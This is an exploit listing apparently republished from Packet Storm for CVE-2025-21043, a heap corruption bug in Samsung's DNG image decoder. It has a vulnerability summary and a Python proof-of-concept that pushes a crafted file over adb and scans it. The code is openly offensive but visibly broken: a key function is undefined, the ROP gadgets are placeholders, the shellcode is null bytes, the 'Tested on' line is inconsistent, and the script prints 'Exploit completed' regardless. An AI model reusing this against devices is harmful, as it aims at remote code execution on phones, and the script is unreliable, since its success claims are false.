## https://sploitus.com/exploit?id=PACKETSTORM:215132
=============================================================================================================================================
| # Title : Samsung QuramDNG Heap Exploitation via Malformed (libimagecodec.quram.so) |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : System builtโin component. No standalone download available. |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/211370/ & CVE-2025-21043
[+] Summary : A vulnerability exists in Samsungโs image decoding library (libimagecodec.quram.so) responsible for parsing Digital Negatives (DNG).
A malformed DNG containing oversized IFD entries can cause heap corruption.
With precise heap grooming, this condition may lead to remote code execution when the malicious DNG is decoded.
[+] Affected Platforms (Likely Impact)
Devices using Quram Codec and containing vulnerable libimagecodec.quram.so, typically:
Galaxy S22 / S23 / S24 series
Galaxy Z Fold / Z Flip
Galaxy A and Tab series
Any Samsung model using Quram decoder before SMRโSEPโ2025
[+] OS Builds Affected:
Android builds where the Quram codec is present and security patch level < September 2025
[+] Technical Description (Root Cause)
libimagecodec.quram.so fails to sanitize the size of metadata entries when parsing a DNG file:
The IFD entry count is taken from the attacker-controlled file.
Size validation is missing.
Heap allocator metadata and adjacent buffers may be overwritten.
Controlled overwrite can result in hijacked code execution.
Critical vulnerable function:
doMapPoly16()
located inside Quram image parsing logic.
Instructions For Saving:
------------------------
1) Save file as:
poc.py
Instructions For Running:
-------------------------
python3 poc.py
[+] POC :
import os
import subprocess
import time
class QuramDngExploit:
def __init__(self):
self.malicious_dng = None
def craft_exploit(self):
"""Create DNG with controlled heap layout"""
print("[*] Crafting malicious DNG file...")
dng_data = create_malicious_dng()
return dng_data
def spray_heap(self):
"""Spray heap with controlled objects"""
spray_code = """
import java.util.ArrayList;
public class HeapSpray {
private static ArrayList<byte[]> sprayList = new ArrayList<>();
public static void spray(int count, int size) {
for (int i = 0; i < count; i++) {
byte[] buffer = new byte[size];
// Fill with pointer-like values
for (int j = 0; j < size; j += 8) {
// Address we want to write
buffer[j] = (byte)0x41;
}
sprayList.add(buffer);
}
}
}
"""
def trigger(self):
"""Trigger the vulnerability"""
print("[*] Triggering vulnerability...")
temp_file = "/data/local/tmp/exploit.dng"
with open(temp_file, 'wb') as f:
f.write(self.craft_exploit())
cmd = [
'adb', 'shell',
'am', 'broadcast',
'-a', 'android.intent.action.MEDIA_SCANNER_SCAN_FILE',
'-d', f'file://{temp_file}'
]
subprocess.run(cmd)
print("[*] Waiting for com.samsung.ipservice to process file...")
time.sleep(10)
self.monitor_logcat()
def monitor_logcat(self):
"""Monitor for crash logs"""
print("[*] Monitoring logcat for crashes...")
logcat = subprocess.Popen(
['adb', 'logcat', '-s', 'DEBUG'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
for line in logcat.stdout:
line = line.decode('utf-8', errors='ignore')
if 'SIGSEGV' in line or 'libimagecodec.quram' in line:
print("[+] Crash detected!")
print(line)
break
def build_rop_chain(self):
"""Build ROP chain for ARM64"""
rop_chain = []
gadgets = {
'pop_x0': 0x123456, # placeholder
'pop_x1': 0x123457,
'system': 0x123458,
'blr_x19': 0x123459,
}
return rop_chain
def achieve_rce(self):
"""Attempt to achieve Remote Code Execution"""
print("[*] Attempting to achieve RCE...")
shellcode = (
b"\x00\x00\x00\x00"
)
return False
if __name__ == "__main__":
exploit = QuramDngExploit()
print("[*] Starting QuramDng exploit (CVE-2025-21043)")
print("[*] Target: libimagecodec.quram.so")
print("[*] Vulnerability: OOB Write in doMapPoly16")
exploit.craft_exploit()
exploit.trigger()
print("[*] Exploit completed")
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================